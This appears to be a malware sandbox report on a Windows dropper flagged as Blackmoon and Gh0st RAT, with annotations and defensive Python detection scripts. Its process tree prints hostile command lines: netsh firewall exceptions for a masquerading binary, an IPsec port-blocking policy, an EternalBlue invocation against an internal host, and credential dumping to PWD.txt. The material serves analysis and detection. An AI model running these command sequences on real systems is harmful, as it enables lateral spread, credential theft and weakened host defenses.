Analysis
max time kernel: 1s
max time network: 90s
platform: windows7_x64
resource: win7-20240611-en
resource tags: arch:x64, arch:x86, image:win7-20240611-en, locale:en-us, os:windows7-x64, system
submitted: 01-07-2024 01:20
Behavioral task behavioral1
Sample: d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe
Resource: win7-20240611-en
Behavioral task behavioral2
Sample: d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe
Resource: win10v2004-20240508-en
General
Target: d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe
Size: 45KB
MD5: 3d3aedfaeaf39544ff74fe6fe4541fc2
SHA1: ad4135e142b3e9564d90d96eca0c21e17f0de542
SHA256: d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71
SHA512: 703b057201b3b261225cca58799c05caa152c5643f7de012d9fb1aff523f35c7c1ac7d24d14bcd3fe67c51b33230d864063077b59e1264ca1da1eada443db581
SSDEEP: 768:XQ7R4nqTvoV22QbyMhOk9w+wRGtVEhq8C5eIdp5b4Fk0v5za:w4nVV22Q+mO0wrwVEUdpaFjv5G
Malware Config
Signatures (all memory and file hits below come from behavioral1, the Windows 7 run)
Detect Blackmoon payload 7 IoCs
yara_rule family_blackmoon
  behavioral1/memory/2844-36-0x0000000000400000-0x0000000000484000-memory.dmp
  behavioral1/memory/384-60-0x0000000000400000-0x0000000000D0A000-memory.dmp
  behavioral1/memory/384-90-0x0000000000400000-0x0000000000D0A000-memory.dmp
  behavioral1/memory/384-94-0x0000000000400000-0x0000000000D0A000-memory.dmp
  behavioral1/memory/384-13624-0x0000000000400000-0x0000000000D0A000-memory.dmp
  behavioral1/memory/384-13645-0x0000000000400000-0x0000000000D0A000-memory.dmp
  C:\Windows\Temp\Wmicc.exe
Gh0st RAT payload 4 IoCs
yara_rule family_gh0strat
  \Windows\Logs\RunDllExe.dll
  behavioral1/memory/936-33-0x0000000000400000-0x0000000000409000-memory.dmp
  behavioral1/memory/936-32-0x0000000000400000-0x0000000000409000-memory.dmp
  behavioral1/memory/2844-36-0x0000000000400000-0x0000000000484000-memory.dmp
Note: the 2844-36 region matches both family_blackmoon and family_gh0strat (and the Defender-tampering and UPX rules below), so the two family labels are not independent evidence of two payloads in that process.
Detects executables containing possible sandbox analysis VM usernames 6 IoCs
yara_rule INDICATOR_SUSPICIOUS_EXE_SandboxUserNames
  behavioral1/memory/384-60-0x0000000000400000-0x0000000000D0A000-memory.dmp
  behavioral1/memory/384-90-0x0000000000400000-0x0000000000D0A000-memory.dmp
  behavioral1/memory/384-94-0x0000000000400000-0x0000000000D0A000-memory.dmp
  behavioral1/memory/384-13624-0x0000000000400000-0x0000000000D0A000-memory.dmp
  behavioral1/memory/384-13645-0x0000000000400000-0x0000000000D0A000-memory.dmp
  C:\Windows\Temp\Wmicc.exe
Detects executables embedding registry key / value combination indicative of disabling Windows Defender features 3 IoCs
yara_rule INDICATOR_SUSPICIOUS_EXE_RegKeyComb_DisableWinDefender
  behavioral1/memory/2096-0-0x0000000000400000-0x0000000000420000-memory.dmp
  behavioral1/memory/2096-1-0x0000000010000000-0x000000001001A000-memory.dmp
  behavioral1/memory/2844-36-0x0000000000400000-0x0000000000484000-memory.dmp
UPX dump on OEP (original entry point) 11 IoCs
yara_rule UPX
  behavioral1/memory/2096-0-0x0000000000400000-0x0000000000420000-memory.dmp
  C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe
  behavioral1/memory/2336-7-0x0000000000400000-0x0000000000420000-memory.dmp
  C:\Windows\4455.exe
  behavioral1/memory/2844-29-0x0000000000400000-0x0000000000484000-memory.dmp
  behavioral1/memory/2844-36-0x0000000000400000-0x0000000000484000-memory.dmp
  \Windows\Temp\MpMgSvc.exe
  behavioral1/memory/384-60-0x0000000000400000-0x0000000000D0A000-memory.dmp
  behavioral1/memory/384-90-0x0000000000400000-0x0000000000D0A000-memory.dmp
  behavioral1/memory/384-94-0x0000000000400000-0x0000000000D0A000-memory.dmp
  behavioral1/memory/384-13624-0x0000000000400000-0x0000000000D0A000-memory.dmp
Downloads MZ/PE file
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
  pid 2152 netsh.exe
  pid 1420 netsh.exe
yara_rule upx 13 IoCs
  behavioral1/memory/2096-0-0x0000000000400000-0x0000000000420000-memory.dmp
  C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe
  behavioral1/memory/2336-7-0x0000000000400000-0x0000000000420000-memory.dmp
  C:\Windows\4455.exe
  behavioral1/memory/2844-29-0x0000000000400000-0x0000000000484000-memory.dmp
  behavioral1/memory/2844-36-0x0000000000400000-0x0000000000484000-memory.dmp
  \Windows\Temp\MpMgSvc.exe
  behavioral1/memory/384-60-0x0000000000400000-0x0000000000D0A000-memory.dmp
  behavioral1/memory/384-90-0x0000000000400000-0x0000000000D0A000-memory.dmp
  behavioral1/memory/384-94-0x0000000000400000-0x0000000000D0A000-memory.dmp
  behavioral1/memory/384-13624-0x0000000000400000-0x0000000000D0A000-memory.dmp
  behavioral1/memory/384-13645-0x0000000000400000-0x0000000000D0A000-memory.dmp
  behavioral1/memory/384-13660-0x0000000000400000-0x0000000000D0A000-memory.dmp
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
  Destination IP: 110.11.158.238
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services. In this run it lines up with the Eternalblue-2.2.0.exe launches against TCP 445 in the process tree and the three versions of C:\Windows\Temp\ip.txt listed under Downloads.
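The two network signatures above describe what the sandbox saw but not how to find the same pattern in your own flow logs. The following is an added example, not part of the sandbox report: FLOWS is a constructed flow log of (src, dst, proto, dport) tuples; the resolver address 10.127.0.1, the infected host 10.127.0.20 and the 50-destination threshold are assumptions chosen for illustration. The only value taken from the report is 110.11.158.238, the destination seen on the DNS port.

```python
"""Flow-based checks for "unexpected DNS destination" and "large amount of
network flows" (port sweep). Added example; the flow records are constructed.
"""
from collections import defaultdict

CONFIGURED_DNS = {"10.127.0.1"}   # assumption: the analysis VM's resolver
SCANNER = "10.127.0.20"           # assumption: the infected host

# Constructed flow log: (src, dst, proto, dport). Not real telemetry.
FLOWS = (
    [
        (SCANNER, "10.127.0.1", "UDP", 53),        # ordinary lookup to the resolver
        (SCANNER, "110.11.158.238", "UDP", 53),    # DNS-port traffic to a non-resolver (report IOC)
        (SCANNER, "10.127.0.50", "TCP", 80),       # one benign connection
        ("10.127.0.30", "10.127.0.1", "UDP", 53),  # unrelated, well-behaved host
    ]
    # One source touching 100 distinct hosts on TCP 445, the SMB sweep shape
    + [(SCANNER, f"10.127.0.{i}", "TCP", 445) for i in range(100, 200)]
)


def unexpected_dns(flows, configured=CONFIGURED_DNS):
    """Destinations contacted on port 53 that are not configured resolvers.

    Malware that tunnels over UDP/53 to its own server looks exactly like this;
    a resolver allowlist is the cheapest way to surface it.
    """
    return sorted({dst for _, dst, _, dport in flows if dport == 53 and dst not in configured})


def port_sweeps(flows, min_targets=50):
    """(src, dport) pairs where one source reached >= min_targets distinct
    destinations over TCP. Counting distinct destinations per (src, port)
    rather than raw flow volume separates a sweep from a busy client."""
    targets = defaultdict(set)
    for src, dst, proto, dport in flows:
        if proto == "TCP":
            targets[(src, dport)].add(dst)
    return {key: len(hosts) for key, hosts in targets.items() if len(hosts) >= min_targets}


if __name__ == "__main__":
    print("unexpected DNS destinations:", unexpected_dns(FLOWS))
    print("port sweeps:", port_sweeps(FLOWS))
```

Tune min_targets to the network: on a flat /24 a worm sweeping SMB will hit far more than 50 hosts within the analysis window, while a backup or monitoring server may legitimately reach dozens on one port, so allowlist such sources rather than raising the threshold for everyone.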
Drops file in Windows directory 2 IoCs
Process: d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe
  File created: C:\Windows\Microsoft.Net\Framework\v3.5\mscorsvw.exe
  File opened for modification: C:\Windows\Microsoft.Net\Framework\v3.5\mscorsvw.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Event Triggered Execution: Netsh Helper DLL 1 TTPs 30 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes: netsh.exe (10 instances)
Registry key: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh
  Key opened: 10 events
  Key queried: 10 events
  Key value enumerated: 10 events
Caveat: all 30 events are reads of the NetSh helper-registration key, which netsh.exe performs at every start to load its helpers. No write to that key was recorded, so this run shows netsh.exe's normal startup, not helper-DLL persistence (the T1546.007 technique the signature is named after). The interesting part of these netsh launches is their command lines, shown in the process tree below.
Suspicious use of WriteProcessMemory 40 IoCs
Source process: d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe (pid 2096)
Target process: netsh.exe, four writes to each of ten children
  pids 1420, 2152, 1164, 2704, 2724, 2644, 2956, 2608, 2652, 2736
Caveat: every target is a netsh.exe child that pid 2096 launched itself (the ten netsh commands in the process tree). A fixed, small number of writes from a parent into a child it has just created is consistent with ordinary process creation, not with code injection into a foreign process.
Processes
1⤵ C:\Users\Admin\AppData\Local\Temp\d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe
   cmdline: "C:\Users\Admin\AppData\Local\Temp\d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe"
   - Drops file in Windows directory
   - Suspicious use of WriteProcessMemory
   2⤵ C:\Windows\SysWOW64\netsh.exe
      cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Microsoft.Net" dir=out program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow
      - Modifies Windows Firewall
      - Event Triggered Execution: Netsh Helper DLL
   2⤵ C:\Windows\SysWOW64\netsh.exe
      cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Microsoft.Net" dir=in program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow
      - Modifies Windows Firewall
      - Event Triggered Execution: Netsh Helper DLL
   2⤵ C:\Windows\SysWOW64\netsh.exe
      cmdline: "C:\Windows\System32\netsh.exe" ipsec static add policy name=Block
      - Event Triggered Execution: Netsh Helper DLL
   2⤵ C:\Windows\SysWOW64\netsh.exe
      cmdline: "C:\Windows\System32\netsh.exe" ipsec static add filterlist name=Filter1
      - Event Triggered Execution: Netsh Helper DLL
   2⤵ C:\Windows\SysWOW64\netsh.exe
      cmdline: "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
      - Event Triggered Execution: Netsh Helper DLL
   2⤵ C:\Windows\SysWOW64\netsh.exe
      cmdline: "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
      - Event Triggered Execution: Netsh Helper DLL
   2⤵ C:\Windows\SysWOW64\netsh.exe
      cmdline: "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
      - Event Triggered Execution: Netsh Helper DLL
   2⤵ C:\Windows\SysWOW64\netsh.exe
      cmdline: "C:\Windows\System32\netsh.exe" ipsec static add filteraction name=FilteraAtion1 action=block
      - Event Triggered Execution: Netsh Helper DLL
   2⤵ C:\Windows\SysWOW64\netsh.exe
      cmdline: "C:\Windows\System32\netsh.exe" ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1
      - Event Triggered Execution: Netsh Helper DLL
   2⤵ C:\Windows\SysWOW64\netsh.exe
      cmdline: "C:\Windows\System32\netsh.exe" ipsec static set policy name=Block assign=y
      - Event Triggered Execution: Netsh Helper DLL
1⤵ C:\Windows\Microsoft.Net\Framework\v3.5\mscorsvw.exe
   cmdline: C:\Windows\Microsoft.Net\Framework\v3.5\mscorsvw.exe
   2⤵ C:\Windows\Microsoft.Net\Framework\v3.5\mscorsvw.exe
      cmdline: C:\Windows\Microsoft.Net\Framework\v3.5\mscorsvw.exe Win7
   2⤵ C:\Windows\4455.exe
      cmdline: "C:\Windows\4455.exe"
      3⤵ C:\Windows\SysWOW64\netsh.exe
         cmdline: netsh ipsec static add policy name=Block
      3⤵ C:\Windows\SysWOW64\netsh.exe
         cmdline: netsh ipsec static add filterlist name=Filter1
      3⤵ C:\Windows\SysWOW64\netsh.exe
         cmdline: netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
      3⤵ C:\Windows\SysWOW64\netsh.exe
         cmdline: netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
      3⤵ C:\Windows\SysWOW64\netsh.exe
         cmdline: netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
      3⤵ C:\Windows\SysWOW64\netsh.exe
         cmdline: netsh ipsec static add filteraction name=FilteraAtion1 action=block
      3⤵ C:\Windows\SysWOW64\netsh.exe
         cmdline: netsh ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1
      3⤵ C:\Windows\SysWOW64\netsh.exe
         cmdline: netsh ipsec static set policy name=Block assign=y
      3⤵ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
         cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Sleep -s 2;del "C:\Windows\4455.exe"
1⤵ C:\Windows\SysWOW64\svchost.exe
   cmdline: "C:\Windows\SysWOW64\svchost.exe"
   2⤵ C:\WINDOWS\Temp\MpMgSvc.exe
      cmdline: "C:\WINDOWS\Temp\MpMgSvc.exe"
      3⤵ C:\WINDOWS\Temp\Eternalblue-2.2.0.exe
         cmdline: Eternalblue-2.2.0.exe --TargetIp 10.127.0.179 --Target WIN72K8R2 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig LOG.txt
      3⤵ C:\WINDOWS\Temp\Eternalblue-2.2.0.exe
         cmdline: Eternalblue-2.2.0.exe --TargetIp 10.127.0.179 --Target WIN72K8R2 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig LOG.txt
      3⤵ C:\Windows\Temp\Wmicc.exe
         cmdline: "C:\Windows\Temp\Wmicc.exe"
         4⤵ C:\Windows\SysWOW64\cmd.exe
            cmdline: cmd.exe /c C:\Windows\Temp\GetPassword.exe >C:\Windows\Temp\PWD.txt
            5⤵ C:\Windows\Temp\GetPassword.exe
               cmdline: C:\Windows\Temp\GetPassword.exe

Reading the tree: the 45KB sample (pid 2096) writes a 20MB UPX-packed executable into Framework\v3.5 under the name of the .NET native-image service, mscorsvw.exe, opens the host firewall for that file in both directions, and then assigns an IPsec policy whose single rule blocks inbound TCP 135, 139 and 445 to the local machine (dstaddr=Me). The dropped mscorsvw.exe re-launches itself with the argument Win7 and drops 4455.exe, which repeats the identical IPsec chain and deletes itself through PowerShell after a two-second sleep. A separate chain under a SysWOW64 svchost.exe runs MpMgSvc.exe, which launches the EternalBlue binary twice against 10.127.0.179:445 (the flags --Target WIN72K8R2, --VerifyBackdoor and --GroomAllocations are the leaked tool's own parameters) and then Wmicc.exe, the process the Blackmoon rules match, which runs GetPassword.exe and redirects its output to PWD.txt (29 bytes in the Downloads list).

Two points for responders. First, the command lines name System32\netsh.exe but the image that ran is SysWOW64\netsh.exe: the sample is 32-bit, so WOW64 file-system redirection applies, which is also why the NetSh registry reads land under Wow6432Node. Second, closing 135/139/445 after infection is worm self-protection: it keeps rival SMB exploits off the host, but it also blocks SMB and RPC based remote administration and collection. The firewall allow rule "Microsoft.Net" is visible in the Windows Firewall console; the assigned IPsec policy "Block" is not, so check for it with netsh ipsec static show all (or the IP Security Policy snap-in) and unassign it before relying on remote tooling.
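The process tree above is the raw evidence; what a detection engineer wants is logic that turns the same telemetry into alerts. The following is an added example, not part of the sandbox report or the malware: it runs three checks over a constructed, Sysmon-style event list modelled on the tree (a parent that drops a file and then asks netsh to allow that exact file through the firewall; a parent that assigns an IPsec policy blocking ports to dstaddr=Me; an EternalBlue command line). The tuple layout, the name sample.exe, and the PIDs used for the EternalBlue and control events are assumptions.

```python
"""Process-event detections for the behaviour shown in the process tree.

Added example; the events below are constructed, not real telemetry.
Each event is (kind, pid, ppid, image, detail): for ProcessCreate the
detail is the command line, for FileCreate it is the path written.
"""
import re
from collections import defaultdict

SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\sample.exe"      # assumed name for the dropper
NETSH = r"C:\Windows\SysWOW64\netsh.exe"                      # image actually run (WOW64 redirection)
NETSH_CMD = r'"C:\Windows\System32\netsh.exe"'                # image named on the command line
DROPPED = r"C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe"

EVENTS = [
    ("ProcessCreate", 2096, 1000, SAMPLE, f'"{SAMPLE}"'),
    # Note the case difference (Microsoft.Net vs Microsoft.NET); paths are compared case-insensitively.
    ("FileCreate", 2096, 1000, SAMPLE, r"C:\Windows\Microsoft.Net\Framework\v3.5\mscorsvw.exe"),
    ("ProcessCreate", 2152, 2096, NETSH,
     f'{NETSH_CMD} advfirewall firewall add rule name="Microsoft.Net" dir=out program="{DROPPED}" action=allow'),
    ("ProcessCreate", 1420, 2096, NETSH,
     f'{NETSH_CMD} advfirewall firewall add rule name="Microsoft.Net" dir=in program="{DROPPED}" action=allow'),
    ("ProcessCreate", 1164, 2096, NETSH, f"{NETSH_CMD} ipsec static add policy name=Block"),
    ("ProcessCreate", 2704, 2096, NETSH, f"{NETSH_CMD} ipsec static add filterlist name=Filter1"),
    ("ProcessCreate", 2724, 2096, NETSH,
     f"{NETSH_CMD} ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP"),
    ("ProcessCreate", 2644, 2096, NETSH,
     f"{NETSH_CMD} ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP"),
    ("ProcessCreate", 2956, 2096, NETSH,
     f"{NETSH_CMD} ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP"),
    ("ProcessCreate", 2608, 2096, NETSH, f"{NETSH_CMD} ipsec static add filteraction name=FilteraAtion1 action=block"),
    ("ProcessCreate", 2652, 2096, NETSH,
     f"{NETSH_CMD} ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1"),
    ("ProcessCreate", 2736, 2096, NETSH, f"{NETSH_CMD} ipsec static set policy name=Block assign=y"),
    # EternalBlue launcher; these PIDs are assumed, the report does not list them.
    ("ProcessCreate", 3140, 936, r"C:\WINDOWS\Temp\Eternalblue-2.2.0.exe",
     "Eternalblue-2.2.0.exe --TargetIp 10.127.0.179 --Target WIN72K8R2 --TargetPort 445 "
     "--VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig LOG.txt"),
    # Control: an administrator allowing a program the parent never wrote. Must not fire.
    ("ProcessCreate", 4000, 3999, r"C:\Windows\System32\netsh.exe",
     r'netsh advfirewall firewall add rule name="VPN" dir=in program="C:\Program Files\VPN\vpn.exe" action=allow'),
]

FW_ADD_RULE = re.compile(r"advfirewall\s+firewall\s+add\s+rule\b", re.I)
FW_PROGRAM = re.compile(r'\bprogram=(?:"([^"]+)"|(\S+))', re.I)   # quoted or bare path
FW_ALLOW = re.compile(r"\baction=allow\b", re.I)
IPSEC_FILTER = re.compile(r"ipsec\s+static\s+add\s+filter\b.*?\bdstaddr=me\b.*?\bdstport=(\d+)", re.I)
IPSEC_ASSIGN = re.compile(r"ipsec\s+static\s+set\s+policy\b.*?\bassign=y\b", re.I)
ETERNALBLUE = re.compile(r"--TargetIp\s+(\S+).*?--GroomAllocations", re.I)


def _norm(path):
    """Case-insensitive, quote-stripped path key for comparisons."""
    return path.strip('"').strip().lower()


def detect(events):
    """Return a list of findings, in event order. State is keyed by the
    parent PID so the netsh children are tied back to the process that
    launched them, which is the actor worth alerting on."""
    findings = []
    created = defaultdict(set)      # pid -> paths that process wrote
    self_block_ports = defaultdict(list)  # ppid -> ports blocked toward dstaddr=Me
    for kind, pid, ppid, image, detail in events:
        if kind == "FileCreate":
            created[pid].add(_norm(detail))
            continue
        if kind != "ProcessCreate":
            continue
        cmd = detail
        # 1. Firewall allow rule for a file the parent itself dropped.
        prog = FW_PROGRAM.search(cmd)
        if FW_ADD_RULE.search(cmd) and FW_ALLOW.search(cmd) and prog:
            program = prog.group(1) or prog.group(2)
            if _norm(program) in created[ppid]:
                findings.append({"rule": "firewall_allow_for_self_dropped_binary",
                                 "pid": pid, "parent": ppid, "program": program})
        # 2. IPsec policy that blocks inbound ports on the local host, once assigned.
        flt = IPSEC_FILTER.search(cmd)
        if flt:
            self_block_ports[ppid].append(int(flt.group(1)))
        if IPSEC_ASSIGN.search(cmd) and self_block_ports[ppid]:
            findings.append({"rule": "ipsec_inbound_self_block",
                             "pid": pid, "parent": ppid, "ports": sorted(self_block_ports[ppid])})
        # 3. EternalBlue command-line parameters.
        eb = ETERNALBLUE.search(cmd)
        if eb:
            findings.append({"rule": "eternalblue_cli", "pid": pid, "parent": ppid, "target": eb.group(1)})
    return findings


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f)
```

Check 1 is the one that generalises: a firewall exception for a file the same process just wrote is suspicious regardless of the file name, so the masquerading as mscorsvw.exe does not matter to it. Check 2 deliberately waits for assign=y, because an unassigned policy has no effect and alerting on each add filter would fire several times per infection. Check 3 is a plain command-line signature and is the first to break if the operator renames flags.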
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
Note: the DLLs dropped beside Eternalblue-2.2.0.exe (posh-0, coli-0, exma-1, tibe-2, trch-1, trfo-2, tucl-1, ucl, libxml2) carry the names of the support libraries the leaked EternalBlue tooling loads, and Eternalblue-2.2.0.xml is that tool's parameter file. C:\Windows\Temp\ip.txt was written three times with different contents (92KB, 1KB, 4KB).

C:\WINDOWS\Temp\posh-0.dll (11KB)
  MD5    2f0a52ce4f445c6e656ecebbcaceade5
  SHA1   35493e06b0b2cdab2211c0fc02286f45d5e2606d
  SHA256 cde45f7ff05f52b7215e4b0ea1f2f42ad9b42031e16a3be9772aa09e014bacdb
  SHA512 88151ce5c89c96c4bb086d188f044fa2d66d64d0811e622f35dceaadfa2c7c7c084dd8afb5f774e8ad93ca2475cc3cba60ba36818b5cfb4a472fc9ceef1b9da1

C:\Windows\4455.exe (162KB)
  MD5    ce1d781ff2e37b62bc314b53c6dae49d
  SHA1   9927eafa1c92788774c3653ded4eba03e6b5d96a
  SHA256 9591e4d1090bc5caa1d1db4ebf929d9113fd36e0521d316762f5cff275b4c733
  SHA512 5fc2faacc8db2c88c0f46634a7a09c8fdc3f1efc4ccf98b10eca3e02147a8c91653a5a27644f5c7e4ec82fc8d3d8f281b2a4c9a075d07588b87684bcab81a672

C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe (20.0MB)
  MD5    09a2fe09dc328d0061c70b7355af4226
  SHA1   615f8a9693e1b8843981c0e95895a9316cda2f64
  SHA256 dacfaf5624e25339114f22694d69120621c779d091a93c38cf4ed71f4f64aa85
  SHA512 2c17356250f38aef17d2e0ce1d7ea73600e53931bc85844d215fa22b665626186560cd3d344559c425e0a97fab4be8aa66bc9e9d2728815cf46b4edd391d2ef2

C:\Windows\Temp\Eternalblue-2.2.0.xml (7KB)
  MD5    497080fed2000e8b49ee2e97e54036b1
  SHA1   4af3fae881a80355dd09df6e736203c30c4faac5
  SHA256 756f44f1d667132b043bfd3da16b91c9f6681e5d778c5f07bb031d62ff00d380
  SHA512 4f8bd09f9d8d332c436beb8164eec90b0e260b69230f102565298beff0db37265be1ae5eb70acf60e77d5589c61c7ee7f01a02d2a30ac72d794a04efef6f25df

C:\Windows\Temp\GetPassword.exe (494KB)
  MD5    5b6a804db0c5733d331eb126048ca73b
  SHA1   f18c5acae63457ad26565d663467fa5a7fbfbee4
  SHA256 5bec6b3bc6f8cbda50a8c5195a488cc82d2e00f18ec75640db31b2376a6db9f9
  SHA512 ba6424051ab9f650967cc2ba428fd6a02ccda8f99d8b8e3f5f321a5e6bbf79a22bfc9cdd582c44980470ebbb7aea1b811fd69aab6bf51466a803c7c722fcde26

C:\Windows\Temp\PWD.txt (29B)
  MD5    be8f141e4550cc702bd43a7ef29b052d
  SHA1   7d391b830fb37cff477c4fea208ae29d149871b1
  SHA256 4f344059be68b21ec54a525f34fc476749d16f651b1ad07f887497c05358a5bb
  SHA512 930ead7cad952221d36f7d747b39b2b333249c782bda2eea70adfe9e55a699babe40966f35fdfdc028d9aa3176c7058970919e569c6777482083dc8e5da404e5

C:\Windows\Temp\Wmicc.exe (1.0MB)
  MD5    e1f8ee38a7e1f76e636499eb40aec1ca
  SHA1   6d5688ea53b2fe9a3fd751350446f6205d94dba0
  SHA256 c82e90cf223bf9c1fb77d44d2cd7678d7ad6994363973502633e7f25fdbd2d93
  SHA512 66ca4dcb5cbf0efbed23b8edf8763bac1b8c1090bb797fb53b00b18d3bf751b4c2e685699f3b08bed393fb0d5183d1a86780291369b817e241e8a0f1224a7ec1

C:\Windows\Temp\ip.txt (92KB)
  MD5    2a1c30784b7ba1a212d82d693f49f217
  SHA1   9b4c9f3236d0b239e3ddd28621af57aa29e4c09a
  SHA256 3e7f856f13e8372c733f7aa1e0e2ff745525f281fc0061089389afd43f9f0ec2
  SHA512 0a97bb22bb5d34ad8e6b9159f261e135b2737f120332a119b158c9d3c63001b4911e96cb9f1f86a198e56c1aff53800ebbef54aecfc521f4568b6d8a66671994

C:\Windows\Temp\ip.txt (1KB)
  MD5    6239bfe2e88c1bbbf8661bbb51ee775e
  SHA1   a0fe5dd915d67a49432a90302e323fbe5c2e83ce
  SHA256 085554735e759fcca498cdddfd0bf7f21a262672c48233d80775cd26bbd41b7b
  SHA512 016a3b2ecdcd27cf22fc91c0cd07441abed2a97c6b8c7954aff8db4e1dd937f2fa0c5bbc6edbf94479be715fa5d927c1c702d1623766af0912d49008a4018e99

C:\Windows\Temp\ip.txt (4KB)
  MD5    a83ed968c49487fa60ed8d6b530f0687
  SHA1   fd6c9f6f40a8c8e4e6b63c3be7d0fabb28a02261
  SHA256 219200ccd149ab3550d84eaf2ff40da39a07dd68d3f1a463dec148050d814059
  SHA512 64e8ec3aed3e75aa7357ac2335aa41d3b867a4c01e75d7a384562437727959c7fd073ded86db0b7abf417b80a9c57861b44282ca1a210514cac97b966cc24a12

\Windows\Logs\RunDllExe.dll (175KB)
  MD5    5847af6bde1243a8810f60e9f48ace97
  SHA1   9652e1d1640dda10803f5fb6909e674e1ea67488
  SHA256 23593861e71b86eb3944f55e780f89fee3da35c0b6a7c88b5e526bc84803fadf
  SHA512 75f1f17ccba168b36b52fa54d034e6caa0f234ecbbdd02c63a8b91ba4e99a88775b1544fcc0d1e347092bcb03213baebad4207db5dd3f663372a8c50098ddc65

\Windows\Temp\Eternalblue-2.2.0.exe (126KB)
  MD5    8c80dd97c37525927c1e549cb59bcbf3
  SHA1   4e80fa7d98c8e87facecdef0fc7de0d957d809e1
  SHA256 85b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5
  SHA512 50e9a3b950bbd56ff9654f9c2758721b181e7891384fb37e4836cf78422399a07e6b0bfab16350e35eb2a13c4d07b5ce8d4192fd864fb9aaa9602c7978d2d35e

\Windows\Temp\MpMgSvc.exe (3.2MB)
  MD5    2311a69113104a760d785a79f45bab74
  SHA1   32e883771883ba44715180e92a20c80638c5c78f
  SHA256 f2af31b74bfe1648b8c06ce5b3869e81ce8caafe4a265e007af4036af3448ae7
  SHA512 aafbd53acb886e6ab7706400852e8b79766ae99f5899b45952dc21cc55d91f0dca2d86e25f2568dc2b497a73a9c7e70682f98d8901c8089ac5650e46e1dd87e1

\Windows\Temp\coli-0.dll (15KB)
  MD5    3c2fe2dbdf09cfa869344fdb53307cb2
  SHA1   b67a8475e6076a24066b7cb6b36d307244bb741f
  SHA256 0439628816cabe113315751e7113a9e9f720d7e499ffdd78acbac1ed8ba35887
  SHA512 d6b819643108446b1739cbcb8d5c87e05875d7c1989d03975575c7d808f715ddcce94480860828210970cec8b775c14ee955f99bd6e16f9a32b1d5dafd82dc8c

\Windows\Temp\exma-1.dll (10KB)
  MD5    ba629216db6cf7c0c720054b0c9a13f3
  SHA1   37bb800b2bb812d4430e2510f14b5b717099abaa
  SHA256 15292172a83f2e7f07114693ab92753ed32311dfba7d54fe36cc7229136874d9
  SHA512 c4f116701798f210d347726680419fd85880a8dc12bf78075be6b655f056a17e0a940b28bbc9a5a78fac99e3bb99003240948ed878d75b848854d1f9e5768ec9

\Windows\Temp\libxml2.dll (807KB)
  MD5    9a5cec05e9c158cbc51cdc972693363d
  SHA1   ca4d1bb44c64a85871944f3913ca6ccddfa2dc04
  SHA256 aceb27720115a63b9d47e737fd878a61c52435ea4ec86ba8e58ee744bc85c4f3
  SHA512 8af997c3095d728fe95eeedfec23b5d4a9f2ea0a8945f8c136cda3128c17acb0a6e45345637cf1d7a5836aaa83641016c50dbb59461a5a3fb7b302c2c60dfc94

\Windows\Temp\tibe-2.dll (232KB)
  MD5    f0881d5a7f75389deba3eff3f4df09ac
  SHA1   8404f2776fa8f7f8eaffb7a1859c19b0817b147a
  SHA256 ca63dbb99d9da431bf23aca80dc787df67bb01104fb9358a7813ed2fce479362
